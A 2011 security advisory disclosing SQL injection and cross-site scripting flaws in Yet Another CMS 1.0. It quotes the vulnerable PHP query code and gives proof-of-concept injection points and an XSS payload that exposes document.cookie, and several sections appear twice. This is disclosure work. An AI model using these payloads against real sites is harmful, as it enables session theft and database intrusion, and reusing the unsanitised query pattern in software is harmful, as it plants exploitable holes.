SSCHADV2011-031 - Yet Another CMS 1.0 SQL Injection & XSS vulnerabilities
Advisory:
|
Yet Another CMS 1.0 SQL Injection & XSS vulnerabilities
|
Advisory ID:
|
SSCHADV2011-031
|
Author:
|
Stefan Schurtz
|
Affected Software:
|
Successfully tested on Yet Another CMS 1.0
|
Vendor URL:
|
|
Vendor Status:
|
informed
|
EDB-ID:
|
17997
|
======================
Vulnerability Description:
======================
Yet Another CMS 1.0 is prone to multiple SQL Injection and XSS vulnerabilities
==============
Technical Details:
==============
// search.php
$result_set = get_search_result_set($_POST[‘pattern’]);
// includes/functions.php
Technical Details:
==============
// search.php
$result_set = get_search_result_set($_POST[‘pattern’]);
// includes/functions.php
function get_search_result_set($pattern, $public = true) {
global $connection; $query = "SELECT id, subject_id, menu_name, position, visible, content, CONCAT(‘… ‘, SUBSTRING(content, LOCATE(‘" . $pattern . "’,content), 200), ‘ …’) as fragment FROM pages WHERE content like ‘" . $pattern . "’"; |
// index.php
<?php find_selected_page(); ?>
// includes/functions.php
function find_selected_page() {
global $sel_subject; global $sel_page; if (isset($_GET[‘subj’])) { $sel_subject = get_subject_by_id($_GET[‘subj’]); $sel_page = get_default_page($sel_subject[‘id’]); } elseif (isset($_GET[‘page’])) { $sel_subject = NULL; $sel_page = get_page_by_id($_GET[‘page’]); } else { $sel_subject = NULL; $sel_page = NULL; } } |
function get_page_by_id($page_id) {
global $connection;
$query = "SELECT * ";
$query .= "FROM pages ";
$query .= "WHERE id=" . $page_id ." ";
$query .= "LIMIT 1";
==============global $connection;
$query = "SELECT * ";
$query .= "FROM pages ";
$query .= "WHERE id=" . $page_id ." ";
$query .= "LIMIT 1";
Exploit
==============
SQL Injection
http://<target>/index.php?page=[sql injection] http://<target>/search.php -> ‘search field’ -> [sql injection] |
XSS
http://<target>/search.php -> ‘search field’ -> ‘"</script><script>alert(document.cookie)</script> http://<target>/index.php?page=’</script><script>alert(document.cookie)</script> |
=====
Solution:
=====
-
================
Disclosure Timeline:
================
18-Oct-2011 – informed developers
18-Oct-2011 – release date of this security advisory
18-Oct-2011 – post on BugTraq
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
http://yetanothercms.codeplex.com/
http://yetanothercms.codeplex.com/workitem/643
http://www.rul3z.de/advisories/SSCHADV2011-031.txt
18-Oct-2011 – post on BugTraq
====
Credits:
====
Vulnerabilities found and advisory written by Stefan Schurtz.
=======
References:
=======
http://yetanothercms.codeplex.com/
http://yetanothercms.codeplex.com/workitem/643
http://www.rul3z.de/advisories/SSCHADV2011-031.txt
Comments
Display comments as Linear | Threaded